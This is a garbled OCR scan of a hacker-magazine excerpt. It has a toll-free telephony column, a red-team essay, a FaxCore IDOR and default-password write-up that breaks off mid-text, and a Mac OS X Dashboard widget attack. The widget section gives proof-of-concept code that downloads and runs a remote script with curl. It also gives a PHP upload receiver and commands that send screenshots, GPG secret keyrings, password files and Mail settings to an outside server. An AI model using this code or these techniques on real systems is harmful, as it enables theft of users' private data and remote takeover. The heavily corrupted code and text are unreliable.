not fami l i ar wi t h Apache, you ' d do wel l to
read up on it fi rst; i t ' s notori ousl y fi ni cky about
i t s confi gurati on f i l e.
The si mpl i ci ty of sett i ng upAnal yti cs is vi tal
for i ts popu l ari ty. Thi s means that i t ' s al so very
si mpl e to serve the appropri ate f i l e l ocal l y.
Just create a pl ai n text fi l e cal l ed urchin. j s
in your new di rectory and type the fol l owi ng
i nto i t :
function urchinTracker() {
window. status 'This site tried to
"contact Google Analytics';
}
That ' s i t! Whenever you access a si te that
tri es to moni tor your act i vi ty usi ng Googl e
Anal yti cs, your web browser wi l l i nstead tel l
you about i t b y wri t i ng a message i n your
browser' s stat us bar. Natural l y, you can change
t hi s scri pt to do whatever you want.
Bear in mi nd that Fi refox doesn' t l et
JavaScri pt programs wri te to t he stat us bar by
defau l t. If you want, you can overri de t hi s by
goi ng to the Fi refox preferences, cl i cki ng on
the "content" tab, c l i cki ng on the "advanced"
button next to the "enabl e JavaScri pt"
checkbox, and t i cki ng "Change stat us bar
text." 127.0.0.1 ww.google-analytics.com
l[
C 2 2%
[
ZnC
I t's hard to bel ieve that another summer work throughout an entire state (Nebraska was
has a l ready passed. However, the stages of often a probl em, as many ca l l centers were
photosynthesis are drawing to an end here in l ocated there). Over time, the system became
the Pcific Northwest, at l east with the decid- very popu l ar, especial l y with phreaks who
uous trees. These have turned bril l iant shades treated tol l -free numbers as an on- ra mp to the
of yel l ow, orange, and red al ong the North l ong distance network. They' d cal l a tol l -free
Cascades Highway. I t ' s tru l y one of the most number on an anal og exchange, then bl ue-box
incredibl e drives in the country, even when onward from there. I ncidental l y, until a few
you ' re an outside pl ant technician winding years ago, you cou l d do this with country direct
your way toward the l atest downed aerial numbers that continued to use C5 signa l ing.
cabl e. Don' t forget your icky-pic! Maybe you stil l can. But I digress.
Anyway, it ' s after midnight here in the In 1984, with divestiture, the FCC granted
Centra l Office, and I 'm watching an infomer- other carriers the abil ity to offer tol l -free
cial on YouTube. This particul ar infomercia l is service. To make this work, specific NXXs were
for the Ronco Dial -O-Matic, which I ' m disap- assigned within the 800 NPA to each carrier.
pointed to report is not a tel ephone. Quantities The tandem switch was then abl e to route ca l l s
are l imited, (I ' m sure that's true), s o I ' m being to the appropriate network. Unfortunatel y, this
urged to cal l 1-800-486-1806 right away! created a probl em. I f you wanted to change
Operators are standing by! tol l -free carriers, you cou l dn' t, because your
Wel l , have you ever wondered what actu- number was l ocked to a specific carrier. As you
a l l y happens when you pick up the phone and might imagine, this l argel y took away incentive
dia l a tol l -free number? Yes, I know, a robot or for carriers to provide competitive rates and
someone in I ndia answers, but have you ever service, particul ar l y for owners of vanity tol l -
wondered what ' s happening on the network free numbers (such as 1-800-FAT- GI RU.
side? Wel l , don' t l et this opportunity sl ip away! I n 1991, the situation came sufficient l y
Grab your phone and get ready to dial right to a head that the FCC ordered that tol l -free
away, because we' re taking a trip to SMS/800. numbers become portabl e. This was, inci-
Ha. Fool ed you! We' re not going anywhere dental l y, the first FCC order requiring number
without a history l esson first. AT& T first invented portabil ity, al though the FCC has subsequentl y
tol l -free 800-number service i n 1967. Busi- ordered l oca l number portabil ity (which a l l ows
nesses frequent l y compl ained that customers you to port wirel ine numbers between wire-
were l ess l ikel y to contact them if they had l ine carriers), wirel ess number portabil ity, and
to pl ace a l ong distance ca l l . At the time, wirel ine-to-wirel ess number portabil ity (note
there was a tol l -free system ca l l ed the Zenith VolP carriers are treated as wirel ine carriers
system, where you cou l d dia l an operator and for purposes of l oca l number portabil ity).
ask for a "Zenith" (or sometimes "Enterprise") Curiousl y, you stil l cannot port a wirel ess tel e-
number, but this was inefficient because a l l phone number t o a wirel ine orVolP carrier, but
cal l s were operator assisted. Col l ect cal l s were again, I digress. Hey, it ' s my union right with
another option but, as with Zenith numbers, this much seniority!
these were al so operator assisted. In response, The FCC order proved to be a genuinel y
AT&T defined the 800 NPA and began offering significant technical undertaking, and it wasn' t
"I n-WATS" service. This offered a huge advan- until May 2003 (after one short extension)
tage: cal l s cou l d be direct-dial ed. Switches that you were fina l l y abl e to port your tol l
were programmed to, i n effect, bil l cal l s to free number. And thus was born SMS/800, the
these numbers as col l ect cal l s, but seaml essl y national tol l -free service bureau. This service
to the user. bureau is responsibl e for, among other things,
The ear l y WATS system was rudimentary tracking RespOrgs (l ong distance carriers and
and required separate tol l -free numbers for others who sel l and/or bil l tol l -free service)
intra-LATA versus inter-LATA cal l ing. This often and providing tol l -free number reservations to
mp'nt that nationwide tol l -free numbers didn't these RespOrgs.
ulumn 2d
l[
C J
When you want to reserve a tol l -free
nu mber, your tel ephone company (RespOrg)
checks with SMS/800 to find out what numbers
are avail abl e. Tol l -free numbers are current l y
avail abl e i n the 800, 888, 877, and 866 NPAs.
The 855 NPA is not currentl y in use, but wil l
be the next tol l -free NPA brought into service.
Once you and your carrier identify a tol l -free
number that you l ike, and presuming that your
carrier i s scrupu l ous (many aren ' t, and this i s a
whol e can of worms I won't open right now),
they wil l reserve it on your beha l f and transmit
your subscriber information to SMS/800 as
required by FCC regu l ations. SMS/800 associ
ates the tol l -free number with the PI C code of
your carrier and (usual l y) the NPA-NXX-XXXX
to which it is routed. This information is then
repl icated to the Service Control Point (SCP)
databases, which are l ocated strategica l l y (and
redu ndantl y) at various switching facil ities
around North America.
I t ' s important to note that you are l ega l l y
the owner of your tol l -free number, a nd not
your l ong distance carrier. Regardl ess of bil l ing
disagreements with your carrier, contract
disputes, or whatever el se, the number bel ongs
to you, and you can transfer it to any other
carrier you l ike, anytime you l ike. Unscrupu
l ous individual s or companies can use this r ul e
t o their il l icit advantage by switching carriers
frequent l y and skipping out on the bil l .
So, what happens after your number i s set
up, and someone ca l l s it? SS7 initiates a data
base l ookup routine, which is a fair l y compl i
cated and not particul ar l y interesting process.
Based on the resu l ts of the database l ookup,
your ca l l is routed to the l ong distance carrier
servicing your tol l -free number, which routes
your traffic over the network - for the most part
- as an ordinary l ong distance ca l l .
There are a few things that are very different
than a normal l ong distance ca l l , however. First
and foremost, when you dial a tol l -free number,
the person you are cal l ing is paying the bil l .
This mea ns that they have H right t o your ANI ,
which is general ly your phone number. So,
when you cal l up Ronco to order a shiny new
Dial -O-Matic, they have the phone number
you're cal l ing from. Fu rthermore, once you
pl ace an order, they magica l l y have an estab
l ished business rel ationship with you, so they
can bother you a l most any time they l ike. And
if this wasn't bad enough for privacy, it gets
worse. Many carriers don't wait until they send
the bil l to send your number. For exampl e, my
tol l -free service provider transl ates the ANI
of anyone cal l ing me to Ca l l er I D data, so I
receive it in real time. Even if someone bl ocks
their Ca l l er I D, I stil l get their number when
they ca l l me. So, the l esson here is that whil e
it ' s never a good idea to assume you ' re anony
mous over the phone, it ' s an especial l y bad
idea when cal l ing tol l -free numbers.
When you ca l l a tol l -free number, in theory,
the person you ' re cal l ing pays the bil l . I n fact,
the FCC ru l es are very cl ear on this point:
you cannot l ega l l y be bil l ed for cal l ing a
tol l -free number. This doesn't stop u nscrupu
l ous providers armed with ANI data, though.
Phone sex l ines l ove to engage in the practice
of "cramming" your bil l with extra charges,
and even AT&T has engaged in the practice
of "back-bil l ing" fraudu l ent third-party bil l ed
cal l s to the originating number.
The FCC r ul es al l owing easy number
portabil ity have l ed to vul nerabil ities that
have occasiona l l y been expl oited by phreaks.
For exampl e, when companies acquire one
another, they sometimes disconnect the l and
l ines of an acquired company, but forget to
switch off the tol l -free nu mbers. This is particu
l ar l y common when l aying off the PBX admin
istrator before winding down the operation
(and seems to happen with startl ing regu l arity).
Phreaks with a wel l -tuned ear can recog
nize the difference between a l ong distance
company disconnect/inval id intercept and a
LEC-generated one. As a phreak, if you dial a
tol l -free number and receive a LEC-generated
intercept, you have potentia l l y struck gol d
because a negl ected tol l -free number i s ripe for
either rerouting or porting to a different carrier.
Using a technique cal l ed pretexting, phreaks
have occasional l y r un up phone bil l s in the
high six figures by rerouting tol l -free numbers
to conference bridges and simil ar nefarious
destinations. They' ve even ported the numbers
to other carriers, resu l ting in the same scenario
repeating over and over again. Carriers try to
prevent this by introducing bogus technical
obstacl es t o porting nu mbers where fraud is
suspected, but these measures are l argel y inef
fective (by FCC design).
And with that, it ' s time to bring another
issue of "The Tel ecom I nformer" to a cl ose. I
feel a sudden urge to audit my empl oyer'S tol l
free number pool ! Drive safel y i n the rain as
the days become ever shorter. And when you
pick out your Hal l oween costume this year,
consider a Berie Ebbers mask as part of the
ensembl e!
References
http://www. sms800. com/ - SMS/800 service
burea u.
http://www.iec.org/online/t utorials/ss7/
-topic08.html - Detailed write-up and
logical topology diagram of SS7 database
lookups.
la
[
C
2%a
[
aZnC
by zeitgeist
OxOO Di scl ai mer
The i nformati on presented i n thi s art i cl e i s
for i nformati on and demonstrat i on pu rposes
onl y. I can not be hel d l i abl e for any damage
you cause us i ng the i nformat i on presented
here. Pl ease use the knowl edge wi sel y and
don't do any harm that you wou l dn't want
done to you rsel f.
Ox1 0 I ntroduction to dashboard wi dgets
In Mac OS X 1 0. 4, Appl e i ntroduced a
feature ca l l ed the "dashboard.". The i dea of the
dashboard is that you have a number of appl i
cati ons readi l y ava i l abl e for you r use. These
appl i cat i ons aren't fu l l -bl own appl i cati ons but
on l y sma l l tool s l i ke ca l cu l ators, converters,
cl ocks, and so on. One very i mportant aspect
of these so-ca l l ed "wi dgets" is thei r abi l i ty to
fetch content from the i nternet. Thi s a l l ows
the possi bi l i ty to have l i tt l e appl i cati ons that
di spl ay, for exampl e, the l atest news from
an RSS feed, current weather condi ti ons, or
stock quotes. The actua I dashboard, wi th the
wi dgets on i t, can be acti vated and shown as
an addi t i onal l ayer on top of the Mac OS X
desktop.
The wi dgets are not on l y abl e to pu l l
content from the i nternet but may a l so i ssue
system commands. Thus, you can pu l l content
from the i nternet and process i t wi th the stan
dard UNI X tool s that come wi th Mac OS X.
Dashboard wi dgets are programmed
mai nl y by us i ng HTML and JavaScri pt. TIl
JavaScri pt engi rw has a coupl e of extensi ons
to i t whi ch are speci fi c for wi dgets.
make i nsta l l i ng root ki ts as easy as repl aci ng
Ibin/bash wi th a modi fi ed versi on from
some server.
The second secu r i ty measu re is a fi l e
cal l ed Tnfo.p1ist. Thi s XML fi l e has to be
suppl i ed wi th any va l i d dashboard wi dget.
I n the XML fi l e are a coupl e of pi eces i nfor
mati on, i ncl udi ng the name and versi on of
the wi dget, some i nformat i on for the i n i t i al
i zati on of the wi dget, and so on. There are
a l so three i mportant bool ean parameters
whi ch a re rdevant to the secu r i ty of wi dgets:
AllowFileAccessOutsideOfWidget,
A1IowNe 1_wCrkI,cce,,,andAIlowCyc lem.
These three parameters control wheth(r
your wi dget has access to fi l es outs i de the
wi dget'S path, if the wi dget is gra nted network
access, and i f the wi dget i s granted access to
command- l i ne ut i l i t i es.
Ox30 What' s wrong with
the securi ty model
Of course wi dgets are on l y executed wi th
l i mi ted ri ghtsnamel y those of the user that i s
usi ng the dashboard wi dget at the moment--
thus denyi ng access to a l ot of system fi l es.
However, we are not rea l l y i nterested i n
creat i ng yet another botnet through root ki ts
that we i nsta l l on the machi ne. What's more
va l u abl e is user data. Si nce w( may access
the system wi th usCr pri vi l eges, wp may pdi t,
remove, or create fi l es wi thi n the user's home
di rectory. Thi s i ncl udes sensi t i Vl data l i ke
/.gnupgh;ecrjng.gpg, whi ch is the
pl ace where PCI) pri vate keys are stored, and
other such thi ngs. Be creati ve.
Of cou rsl you mi ght arguE that thi s is not
a probl em speci fi c to dashboard but that it is a
Ox20 Dashboard's security model secur i ty ri sk that any appl i cati on mi ght pose.
As you read the i ntroductory part of thi s That i s correct; however, dashboard wi dgets
art i cl e, you have probabl y a l ready thought of are eas i l y i nsta l l ed by the user and rarel y
al l the thi ngs you can do by combi n i ng the consi dered in terms of secu ri ty. Dashboard
i nternet access of a dashboard wi dget wi th wi dgets arc a l so very eas i l y devel oped and
the abi l i ty t o execute system commands. depl oyed. More on that l ater.
However, there is a secur i ty model u nder l yi ng The second aspect of thl' slcur i ty model i s
the dashboard appl i cati on whi ch executes the In fa. pI i s t, whi ch is a l so ca l l ed a "property
i ndi vi dual wi dgets. I i st" in Appl e ja rgon. Usua l l y the In L C pI i
The fi rst secu ri ty measure is the fact that the fi l e is edi ted by the devel oper of the wi dget to
wi dgets are on l y executed wi th the r i ghts of gi V( access to the resou rces that the wi dget
the user who is cUrrl'nt l y usi ng the dashboard needs in order to work. The 1 nt o. pI is Li s
wi dget. So there i s no system- l evel access t o bu ndl ed wi th the wi dget and norma l l y never
ulumn 2d
la
[
C O
seen agai n by regul ar users. Th i s means that
the user has to trust the wi dget ' s devel oper
to set the proper access permi ssi ons for the
wi dget. Wi thout manual l y edi t i ng the prop
erty l i st f i l e, the user has no control over the
wi dget ' s securi ty sett i ngs.
Ox40 Expl oi tation concept
Because users usual l y don't check a
wi dget ' S internal worki ngs after downl oadi ng
and i nstal l i ng i t, and because wi dgets are
eas i l y created usi ng the new Dashcode appl i
cat i on from Appl e, the fol l owi ng scenari o
mi ght be possi bl e:
An attacker creates a wi dget whi ch is as
si mpl e as count i ng down the days unt i l the
start of the Ol ympi c games i n Chi na. The
wi dget i s smal l and downl oaded by thousands
of sports ent husi asts from around the worl d.
The wi dget i s al ways opened i n t he dashboard
because it is so smal l and l ooks so innocent. I n
real i ty, however, the attacker has granted the
wi dget network access, fi l e access, and system
access. Peri odi cal l y the wi dget connects to a
central , or perhaps di stri buted, command and
control server that sends new i nstructi ons to
the wi dget. Thi s cou l d be done, for exampl e,
every t i me the wi dget updates the days unt i l
the event starts or every t i me t he user opens
the dashboard. The server' s i nstructi ons are
then downl oaded and stored on the fi l e
system, maybe in the / trp di rectory wi t h
some obscure name, and executed. I n these
i nstructi ons cou l d be anythi ng, i ncl udi ng a
l ocal root expl oi t to real l y gai n access to the
system, i nstructi ons that the system shou l d
forward any mai l t he user has recei ved to
another account, or commands to del ete the
contpnt of the user ' s documents di rectory.
Ox50 Proof of concept
have created a si mpl e proof-of-concept
wi dget. Thi s wi dget l ooks for an i nstructi on fi l e
on a server, and then downl oads and executes
those i nstructi ons. Current l y, the i nstructi on
fi l e tel l s the wi dget to take a screenshot of
the act i ve screen and upl oad it to a server.
The fi l e may, however, contai n any type of
commands.
There are three parts t o th i s proof of
concept: of course there is the wi dget, there
is the i nstructi on command fi l e, and there i s
a smal l PHP scri pt whi ch takes t he screenshot
and stores i t on the server.
Ox51 The wi dget
The wi dget was created usi ng Appl e' s
al l -new Dashcode appl i cat i on. The defau l t
"Hel l o, Worl d! " wi dget was used and modi
fi ed. Two new functi ons were created i ns i de
of the JavaScri pt fi l e that Dashcode creates by
defau l t. The fi rst functi on i s cal l ed nasty ( )
and i s responsi bl e for downl oadi ng and
execut i ng the i nstructi on fi l efrom the server. The
second functi on i s cal l ed dummyHandler ( )
and is onl y used to make the widget.
s ys ter ( ) cal l s non- bl ocki ng.
As you can see, the nasty ( ) func
t i on rel i es on bei ng al l owed to make
wi dge ' . s ys ter ( ) cal l s . lnthreesystemcal l s,
the ma ster. sf fi l e i s downl oaded i nto the
/ tmp di rectory, made executabl e, and then
executed. Wi thout the dummyHandler ( )
cal l , the whol e wi dget wou l d l ock up unt i l the
processes fi ni shed. A mal i ci ous wi dget mi ght
seem suspi ci ous i f i t l ocked up for too l ong.
As the code shows, I am usi ng the curl
program to downl oad the i nstructi on fi l e. Thi s
i s t he part where we need system and network
access, so AllowNetworkAcces s and
AllowSys t. er need to be true. In order to
store the i nstructi on f i l e outsi de the wi dget ' S
di rectory and execute i t there, we need the
AllowFileAcce s sOuts ideOfWidget
di recti ve to be true i n the wi dget ' S property
l i st.
f unc t i on na s ty ( ) {
i f ( wi ndow . wi dgc t )
wi dqot . sys t em ( ' / u s r / bi n / cur l O /
-Lrp/ ma s t cr . :h h t tp : / / www .
g e l ::t er t u ncc .
"org/ mas t er . sh ' , dummyHand l er ) ;
wi dge t . sys tem ( ' ! b i n / chmod u+ x
-t rp/ ma s t 0 r . sh " dummyHandl er ) ;
wi dg e t . sys t PI ( " / Lmp/ ma: L py . !
-dummyfand icr ) ;
)
func t i on dummylnndl pr ( )
The rel evant entri es in the I nfo. pl i st l ook
l i ke th i s:
< kcy .Al l owF ileAcccs sOut
s i deO[Widge l< ! key>
< true / >
< key>AI L owNe LworkAcc: es s < / kcy>
<t rue / >
< key>Al l owSys t cm< / kcy>
< t L ue / >
Make sure that you have set the
HTTP_PROXY envi ronment vari abl e i f you are
beh i nd a proxy; otherwi se, curl wi l l fai l .
Ox52 The i nstruction fi l e
The i nstructi on fi l e i s strai ghtforward. You
can eas i l y test it by execut i ng it on your own Mac
OS X system. Here we fi rst execute the logger
program to wri te someth i ng to the l og fi l es.
After that, we execute the screencapture
tool wi t h appropri ate parameters to turn off
the sound and to request capture of the whol e
screen. Fi nal l y, we upl oad the i mage to the
server.
l
[C -
---------2%
[
ZnC
! l f b i n / ba" h
/ bi n/ ccho " Owrwd by e i tgc i s t "
' / u r- / bi n / l ogc r
# For srreen captll r i ng a nd Llpl oadi nq
s crcvnc: upL u - Sx / l mp / s c rcen . j pg
cU T l F uscyf1 c - @ / tTlp/ ; c lccn . j pg
% l pr e :ok ht Lp : / / www . yc i :_ L e r ; L u rl de
-. org / up i oad . php
Ox53 The upl oad PHP scri pt
The PHP scr i pt on the server i s a l so stra i ght
forwarrl . I n orrler to ensure u n i Cue fi l enames,
i t creates a fi l e based on the md5 sum of the
cu rrent ti mestamp. I t then moves the upl oaded
fi l e to the fles/ di rectory. Make s ure that
the fles / di rectory i s wri tabl e by the web
server.
r php
$ upl oact di r - fil es / ' ;
$ ll p l udfl e - $upl uJdd i r
.
md', | t. ime | l l . " . j pg " ;
i f ( i s s et ( $_REOUE,T [ ' pIPes ' [ l )
movpll pl oaded_h l e ( $_F LES ! ' Uf; P r f 1 e I
- l ' trnp __name I 1 r
upl (adfl l c ) ,
? >
Ox60 Endl ess possi bi l ities
Here a re a few i deas for other t hi ngs one
can do wi th user- l evel access i ns i de of thp
command fi l e:
Ox61 Upl oad the -I.gnupg/secri ng.
gpg to get a user' s private epe keys
/ i1 .L I bi i / i L
"ccri l .
F 11 S Cy f l c @- / . qntJ pg /
- F pr- cs s =ok h t tp : / /
w
\. qC 1 : tel t OlO . on] / upl oad . php
Ox62 look for al l files contai ni ng the
stri ng "password" and upl oad these fi l es
To accompl i sh t hi s, we use the use the
mdfnd ut i l i ty, whi ch i s i s a commanr- l i ne
front end to the Mac as x Spot l i ght search
engi ne.
for !1 Cl0C 1 l 0ODlO pas sword' ; do
if I [ C !1 Cl0 I I ; then
/usr / bi l / cut .l O CtI1 C !l Cl0C
presf =ok http : / /W. gei ters tunce .
"org/ upload . php
f
done
Ox63 look through the user' s
-/li braryl di rectory
There are a n umber of i nteresti ng sett i ngs
to fi nd, i ncl udi ng address book content and
i eal events.
Ox64 Read the user' s Mai l . app setti ngs
We can store these sett i ngs i n a fi l e and
u pl oad i t; we' l l t hen be abl e t o fi nd out t he
user's e- mai l address, account type, and so
on
de f aul t s red com . appl e . Ma i l
.
> I lmp/ fi i l cJ cf ault, . tx t
i f [ [ C / |H/ HD 1 1 O! DO i l .
Lx t " [ J ; Lhen
/ ll !; r / bj Jl / C ll l- l l ll Ee r--l l e - C / l mp / ma i |
-df r- all l U- . L x L l p n : - u k ht tp : / / www .
-ge i : l t r :L unue . o r _/ upl odd . php
!
Ox65 Change the user' s
defaul t page i n Safari
dcfDu l t_ s wl i t c com . appl e . Sa fa r i
- l I omFPage
- . . h L t p : / / www . ge i t er .:tundC . u r g . .
Ox70 Maki ng thi ngs easy for you
The us ual way to depl oy wi dgpts i s through
the Appl e wi dgets downl oad si te. When you
want to publ i s h a wi dget i n the i ndex on thei r
websi te, you submi t you r wi rget and some
other i nformat i on a l ong wi th i t . Howlver,
a user who wants to downl oad t he wi dget
does n' t downl oad it from the Appl e websi te,
but rather from the author ' s or i gi nal websi tp.
I assume that Appl e revi ews thl rlashboarr
wi dgets before publ i s hi ng them i n thei r i ndex;
however, i f you are abl e to change the wi dget
after it is i ndexed, there is no rea l trust i n thp
Appl e wi dget i ndex.
Another securi ty feature was added by
Appl e: the i dea i s that after you downl oad
a wi dget, i t seems l i ke i t the wi dget i s n' t
executed, but i nstead a wi ndow as ks i f you
woul r l i ke to " keep" or "del ete" the wi dget.
I n rea l i ty, however, the wi dget and poss i bl y i ts
ma l i ci ous code are executed even before the
user deci des to " keep" or "del ete" the wi rget.
I have contacted Appl e about t hi s speci fi c
vul nerabi l ity, but they haven ' t repl i ed yet.
Ox80 Wrap up
The code exampl es presented in this articl es
may be downloaded from !LL j . / /www . C1 L C
w
L!lOC . CJ / w1 OCl. The fil e bacl w i dgel .
z i p contains an example widget which executes
code from my server when cl icked upon.
There is al so a publ icl y accessibl e directory of
screenshots and other things I have captured, avail
abl eathl tp : / / www . C l L Ct lOlOC . Ot/ !I es / .
Pl ease b e aware that if you depl oy the example
widget, a screenshot of your machine wil l be
posted to the site.
I have al so created a sma l l tool cal l ed "Widget
Inspector, " avai l abl e at ht tp : / / ww . ge i s ter
-s lOlO . Ct/ wi dgc t / w1 OC L1lCClot . z ip,
which examines the widgets on your hard drive
in terms of the security issues presented in this
articl e.
Greetings to dorothea, macglove, mattjowil,
alex, yin, frida, the Machackers,
and the CCc.
ulumn 2d
l
[
C
"'ll
PENETRATION TESTING
THE RED TEAM WAY
by MS-Luddite
What i s Penetrati on Testing?
Penetration testing is a method of evalu
ating the secu rity of a computer or networ k
by simulating an attack by an intr uder. I n
most cases, the tests are performed by outside
consultants; however, t he company IT depart
ment or secu rity group may also perform
t he tests. The general format of the test is to
enu merate all operating systems and services
r unning on t he target network and then to
attempt to exploit any known or discovered
weaknesses in those systems.
Enter the " Red Team"
While traditional penetration testing
methods are extremely valuable and very
efective, there is another approach that
provides a fa r more rea l istic evaluation of an
organi zat i on' s overall secu rity posture. Red
Team penetration testing, or "Red Teaming" as
i t i s commonly called, i s an entirely different
way of testing network security. I nstead of
working the test by moving down a check list
of predetermined items or running an appli
cation that systematical l y sea rches for vulner
abilities to exploit, the "Red Tea m" executes
the attack in a manner consistent with the
actions of real intruders. The term "Red Team"
comes to us from the United States milita ry. I n
military exercises, the good guys are always
the Bl ue Team and the bad guys are always the
Red Team. The Red Team attempts to attack
the resou rces of the Blue Team in an environ
ment similar to a game of capture the flag.
This system was devised to provide milita ry
personnel with live training exercises that are
as close to real combat situations as possible.
are made to spare these systems from the nega
tive effects of the attacks being conducted. For
example, suppose the Red Team has learned
that t he target network is r unning a Microsoft
Windows Exchange Mail Server and that their
research shows that this particular version of
Exchange is vulnerable to a common form of
attack called a buffer overflow. This attack will
cause the server to enter into an error state
that would allow an attacker to run arbitrary
system commands in an effort to compromise
the mach i ne. The attempt wi I I be made without
regard for possible damage to the server in
question. The only decision will be when to
attempt t he exploit, such as after hou rs, over
the weekend, or on a holiday. By freeing the
minds of the team to behave as a real attackers,
Red Teaming creates a much more rea l istic
environment in which to evaluate the security
of the target network or system.
legal and Other Concerns
I t should be mentioned that there are often
some predetermined bounda ries when using
the Red Tea m approach to penetration testing.
The bounda ries will be unique to the partic
ular test and depend on many factors, possibly
including the target environment, manage
ment concerns, and industry regulations. For
example, the financial services industry is
federally regulated. It is conceivable in the
previous exampl e of a vulnerable Micro
soft Exchange Mail Server that laws would
be broken if the Red Team were to actively
exploit the live server. It is also possible that
senior management would exercise their right
to limit certain aspects of t he tests in order to
protect the company from negative exposure.
For i nstance, if the decision has already been
made to replace a piece of equipment known
to be insecu re, t hen that device might be
Red Teami ng Structure
deliberately excluded from the test in favor of
When the Red Team begins the penetra-
later testing of the new device. The organizers
tion test, t hey begin as a real intruder would
of the test may also choose to simply mar k
begin an attack. I n most cases, no one at t he
certain systems or networks as off limits for
ta rget is infor med of the time of an impending any reason they deem appropriate. Another
attack. Any tools or attack methods used will option is to have the Red Team discover all
be executed on the live networ k or computer attack possibilities from the outside with no
systems being tested. Few or no preparations previous knowledge of t he target and th

n to
la
[
C d

%a
[
aZ

C
test those possi bi l i t i es i n a l ab envi ronment.
Whi l e thi s i s not as rea l i st i c as an acti ve attack
on l i ve systems, there are many t i mes when
thi s approach is more appropri ate for the busi
ness. On l y di scussi on between management,
Red Team members, and l egal cou nsel can
answer thi s questi on. It is of paramount i mpor
tance that both management and the Red Team
have a cl earl y defi ned scope of work on paper
and si gned before a test begi ns to prevent any
mi sconcepti ons that cou l d draw both s i des
i nto l egal troubl e.
Hackers and Crackers
The word hacker has come to i mpl y a
shady i ndi vi dual s i tt i ng at a computer i n the
mi ddl e of the n i ght, dri nk i ng caffei ne wi th
abandon and havi ng no goal beyond the
destructi on of networks. The ori gi ns of the
word "hacker" actu a l l y predate t he I nternet,
and many hacki ng groups have nothi ng at
a l l to do with computers. However, years of
medi a coverage of computer i ntrus i ons have
confl ated t he terms hacker and cri mi nal , and
so the word has stuck. Some peopl e thi n k that
Red Tea mi ng i s hack i ng and that t hose who
use th i s approach a re cri mi na l s themsel ves.
There i s a sma l l degree of truth to th i s state
ment; many penetrati on testers choose thei r
career i n order t o hack wi thout t he fear of
l egal repercussi ons. It is al so true t hat many
of t he best penetrati on testers are former
hackers themsel ves. However, i t i s obvi ous
t hat t he benefi ts of t he Red Team approach
far outwei gh these mi sgui ded concerns. In my
work as a securi ty cons ul tant, I have person
a l l y wi t nessed a Red Team test conducted
s hort l y after an i nter na l audi t by t he company
I T department. Several new systems had been
i nsta l l ed by outsi de securi ty professi onal s. The
contractors had taken great care to secu re t he
systems, and the i nterna l I T department was
di l i gent whi l e revi ewi ng the work. However,
the Red Team sti l l fou nd several poi nts of
entry i nto the network that had been mi ssed
by the tradi t i onal penetrat i on tests. How ca n
thi s be expl ai ned? There are three answers to
thi s quest i on: fi rst, no matter who secu res a
system, there i s al ways somethi ng mi ssed that
cou l d l ead to a compromi se; second, even if
you hi re an expert to secu re a system, they
usua l l y don ' t mai ntai n the system after the
i n i t i al set up, wh i ch can l ead to mi sconfi gura
t i on or newl y di scovered weaknesses after the
t i me of i nsta l l ; and, fi na l l y, I guess I am a bi t
bi ased, but I a m a true bel i ever i n what I ca l l
the " Hack Factor." I defi ne thi s factor a s that
certai n somet hi ng i ns i de a hacker that si mpl y
dr i ves t hem unt i l a sol ut i on to a probl em i s
fou nd. Si mpl y stated, i f I were goi ng to h i re
someone to test my network secu r i ty, I wou l d
h i re a hacker. I bel i eve that there i s a ter r i bl e
shortage of hackers i n professi ona l secur i ty
compani es.
Concl usi ons
I t i s cl ear that the Red Team approach
i s a val u abl e tool avai l abl e to penetrati on
testers and to anyone el se responsi bl e for
network secur i ty. The out-of-box th i nk i ng that
i t promotes can often mea n t he di fference i n
di scover i ng a probl em before a n attacker does.
When conduct i ng any test, a l ways remember
that there i s no such thi ng as total secur i ty
for any system. Secur i ty is a process, not a
sol ut i on. We must therefore a l ways cont i nue
thi nk i ng about every possi bl e attack vector
that may be ava i l abl e to an i ntruder. The one
thi ng that you can be assured of i s that your
enemi es a re doi ng the same.
Reference
h t tp : / / en . wi kipedi a . org/ wi k i / Red_Team
I I _ I
1 _ _ _ I I _ _ _
_I _ \ \ I I I I _ \ I _I
I I I LI I > < I I_I L) I I I
I_ I \_$ _I _/ \_\ \ _\_, I _ I \
1 \ I I I I _ \ I I ( _) I
I \ I I I I I I I I I I I I I I I
I 1 \ \ 1 I I I I I I I I I I _I \ \ 1 I . _ \ 1 I I _ \ 1 I _'
I _ \ I _I I _ I I _ I I _I I I I ~ * I 1 _) I I ( _) I I I _
I _I \_\ _/ 1 _ '_1 1 _/_1 \_\ . _/ 1 _ 1 \ _/ 1 _ 1 \_1
I I
I _ I
by El ement.Crying "bi g fi sh" that I was l ooki ng for.
El ement.Cryi ng@Gmai l . com
Once I l ogged i n to the system, I started
l ook i ng t hrough the source code of the
recentl y was put i n charge of the defaul t page. There was very l i tt l e code to see;
i nstal l at i on and i mpl ementat i on of my the page j ust contai ned an i frame whi ch
company's new web-based FaxCore faxi ng poi nted to "menus /mainMenu/ defaul t .
system. L i ke any good I T manager, I spent the -aspx ? xAUI D=2 0 0 2 & . " The part I was
fi rst week tryi ng to fi nd any bugs or expl oi ts i nterested i n was the "xAUI D" part. I started
whi ch mi ght cause a hal t i n the company's mani pul at i ng the n umber i n the "xAUI D"
product i vi ty. The system was pretty sol i d when parameter, and much to my s urpr i se, I was
i t came to bugs, of whi ch I onl y fou nd a few. accessi ng di ferent system accou nts. There
I di d di scover a n i ce-si zed secu ri ty expl oi t i n are seven system accounts, numbered
whi ch anyone wi th a l i tt l e bi t of knowl edge from 2 001 to 2 007. One of these i s the
can vi ew any u ser's domai n password. admi n accou nt. By s i mpl y poi nt i ng my web
I have revi ewed the source code, so I browser at http : / / faxcore . domai n .
know that the i n i t i al l ogi n screen for the local / ? xAUI D=2 0 0 1 &, I found mysel f
FaxCore system i s pretty sol i d; the expl oi t l ogged i n as the admi n i strator of t he FaxCore
onl y works once you have l ogged i n to the system. Aga i n, thi s i s a pretty bi g secur i ty hol e,
system. When confi gur i ng our system, we but I wanted to know how much damage thi s
chose t o i mport a l l of our u sers us i ng Acti ve system cou l d real l y do; afer al l , i t i s j ust a
Di rectory. You wou l d need the l ogi n name faxi ng system.
and password of someone i n t he domai n FaxCore s hi ps wi t h a feature that al l ows
to get i nto FaxCore-r so I thought. I read the admi n i strator to " i mpersonate" another
t hrough the admi n i strat i on gu i de, whi ch i s u ser, gi vi ng access to that u ser's fax mai l box.
avai l abl e on l i ne, and I di scovered t hat t he The i mpersonate funct i on actual l y wor ks on
defaul t account created on a new FaxCore the same techni que as the above- menti oned
system i s s i mpl y "Admi n" wi t h the password expl oi t; i t opens up a new wi ndow and
of "Pssword" . The admi n account i s t he onl y changes t he "xAUI D. " From t he admi n i strat i on
